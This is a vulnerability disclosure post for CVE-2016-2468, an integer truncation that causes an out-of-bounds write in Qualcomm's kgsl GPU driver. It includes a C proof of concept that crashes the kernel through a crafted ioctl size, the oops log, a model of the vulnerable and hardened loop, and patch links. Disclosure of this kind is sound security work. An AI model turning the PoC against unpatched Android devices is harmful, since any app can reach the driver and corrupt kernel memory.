Disclosure of CVE-2016-2468, OOB write in Qualcomm MSM GPU driver
Author: retme  Published: June 12, 2016  Category: AndroidSec
This issue has been released in the June 2016 Nexus public bulletin.
https://source.android.com/security/bulletin/2016-06-01.html#acknowledgements
Technical Detail:
In _kgsl_sharedmem_page_alloc, 'size' is a size_t (64-bit) but 'len' is an int (32-bit). If the low 32-bit part of 'size' is greater than 0x80000000, the assignment 'len = size' makes 'len' a negative number.
The while loop is therefore never entered, and execution reaches 'sg_mark_end(&memdesc->sg[sglen - 1]);'.
Note that 'sglen' is still zero at that point, so the end mark is written to the address 'memdesc->sg[-1]'.
static int _kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc,
                                      struct kgsl_pagetable *pagetable,
                                      size_t size)
{
    int ret = 0;
    int len, page_size, sglen_alloc, sglen = 0;
    unsigned int align;
    //...snip...
    len = size;
    while (len > 0) {
        //...snip...
    }
    memdesc->sglen = sglen;
    memdesc->size = size;
    sg_mark_end(&memdesc->sg[sglen - 1]);
    //...snip...
}
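To make the truncation concrete, here is an added model of that loop; it is not the kernel's code and not the vendor patch. The vulnerable form keeps 'len' as int exactly as the driver did, the hardened form keeps 'len' the same width as 'size' and rejects a zero or oversized request before anything could index sg[-1]. MODEL_PAGE_SIZE, vuln_sglen, fixed_sglen and the max_size bound are assumptions of the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed page size for the model (the real driver picks page_size
 * per iteration; 4 KiB is enough to show the counting). */
#define MODEL_PAGE_SIZE 4096

/* Vulnerable shape: 'size' is 64-bit, 'len' is a 32-bit int.
 * Returns the number of scatterlist entries the loop would build.
 * A return of 0 means the loop was skipped, so the driver's
 * sg_mark_end(&sg[sglen - 1]) would write to sg[-1]. */
int vuln_sglen(size_t size)
{
    int len, sglen = 0;

    len = size;                 /* keeps only the low 32 bits; may go negative */
    while (len > 0) {
        sglen++;
        len -= MODEL_PAGE_SIZE;
    }
    return sglen;
}

/* Hardened shape: 'len' has the same width as 'size', and the request is
 * validated up front. Returns -1 (stand-in for -EINVAL) on rejection,
 * otherwise the entry count, which is always >= 1. */
int fixed_sglen(size_t size, size_t max_size)
{
    size_t len, sglen = 0;

    if (size == 0 || size > max_size)
        return -1;
    for (len = size; len > 0; ) {
        sglen++;
        len -= (len >= MODEL_PAGE_SIZE) ? MODEL_PAGE_SIZE : len;
    }
    return (int)sglen;
}

int main(void)
{
    /* The size from the PoC above: low 32 bits are 0xb0c08000. */
    size_t poc = 0xa18fb010b0c08000ULL;

    printf("vuln_sglen(poc)  = %d (0 => sg[-1] write)\n", vuln_sglen(poc));
    printf("fixed_sglen(poc) = %d (-1 => rejected)\n",
           fixed_sglen(poc, (size_t)1 << 30));
    return 0;
}
```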
PoC:
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/msm_kgsl.h>   /* struct kgsl_gpumem_alloc_id, IOCTL_KGSL_GPUMEM_ALLOC_ID (MSM kernel header) */

void kgsl_poc()
{
    // reached via kgsl_sharedmem_page_alloc_user
    int fd = open("/dev/kgsl-3d0", 0);
    struct kgsl_gpumem_alloc_id arg;
    arg.flags = 0;
    // low 32 bits are 0xb0c08000, which becomes a negative 'int len'
    arg.size = 0xa18fb010b0c08000;
    ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC_ID, &arg);
    close(fd);
}

int main(int argc, char *argv[])
{
    kgsl_poc();
    return 0;
}
Crash:
<1>[ 112.913308] Unable to handle kernel paging request at virtual address ffffff800da40fe0
<1>[ 112.913323] pgd = ffffffc0588a8000
<1>[ 112.913328] [ffffff800da40fe0] *pgd=0000000000000000
<0>[ 112.913339] Internal error: Oops: 96000007 [#1] PREEMPT SMP
<4>[ 112.913350] CPU: 2 PID: 5511 Comm: 3636test Tainted: G W 3.10.73-gda330d0 #1
<4>[ 112.913356] task: ffffffc0b0600000 ti: ffffffc0946fc000 task.ti: ffffffc0946fc000
<4>[ 112.913370] PC is at kgsl_sharedmem_page_alloc_user+0x1ec/0x268
<4>[ 112.913376] LR is at kgsl_sharedmem_page_alloc_user+0xa8/0x268
<4>[ 112.913382] pc : [<ffffffc000576b58>] lr : [<ffffffc000576a14>] pstate: a0000145
<4>[ 112.913386] sp : ffffffc0946ffc10
<4>[ 112.913390] x29: ffffffc0946ffc10 x28: ffffffc000000000
<4>[ 112.913398] x27: ffffffc000c9d000 x26: 0000000000001500
<4>[ 112.913406] x25: ffffffc000c9a000 x24: cccccccccccccccd
<4>[ 112.913415] x23: ffffffc001791bc0 x22: 00000000b0c08000
<4>[ 112.913423] x21: a18fb010b0c08000 x20: ffffffffffffffe0
<4>[ 112.913431] x19: ffffffc093255248 x18: 0000007f9b45c000
<4>[ 112.913439] x17: 0000007f9b309264 x16: ffffffc00030cf48
<4>[ 112.913447] x15: 0000000000000001 x14: 0000007f9b44e040
<4>[ 112.913454] x13: 00000000000000a0 x12: 0000000000000001
<4>[ 112.913462] x11: 0000000000000068 x10: 0140000000000000
<4>[ 112.913471] x9 : 0000000000000000 x8 : ffffff802f059100
<4>[ 112.913478] x7 : 0000000000000000 x6 : 000000000000003f
<4>[ 112.913486] x5 : 0000000000000040 x4 : 0000000000000000
<4>[ 112.913494] x3 : 0000000000000004 x2 : 0000000000000000
<4>[ 112.913502] x1 : ffffff800da41000 x0 : ffffffffffffffe0
<4>[ 112.913509]
<0>[ 112.913514] Process 3636test (pid: 5511, stack limit = 0xffffffc0946fc058)
<4>[ 112.913519] Call trace:
<4>[ 112.913526] [<ffffffc000576b58>] kgsl_sharedmem_page_alloc_user+0x1ec/0x268
<4>[ 112.913535] [<ffffffc000569820>] _gpumem_alloc+0x150/0x1d0
<4>[ 112.913543] [<ffffffc00056d424>] kgsl_ioctl_gpumem_alloc_id+0x30/0x180
<4>[ 112.913550] [<ffffffc00056f704>] kgsl_ioctl_helper+0x220/0x2b8
<4>[ 112.913558] [<ffffffc00056f7b8>] kgsl_ioctl+0x1c/0x28
<4>[ 112.913566] [<ffffffc00030ce74>] do_vfs_ioctl+0x4a8/0x57c
<4>[ 112.913573] [<ffffffc00030cfa4>] SyS_ioctl+0x5c/0x88
<0>[ 112.913581] Code: d503201f 9b210294 f9402261 f9001a75 (f8746820)
Any application can open the device '/dev/kgsl-3d0', which is why the Android Security Team rated this issue Critical severity.
Patch:
https://android.googlesource.com/kernel/msm/+/fb17eb73640b869ed4920791af1dfd680026fd49%5E%21/#F0
Original post: http://retme.net/index.php/2016/06/12/CVE-2016-2468.html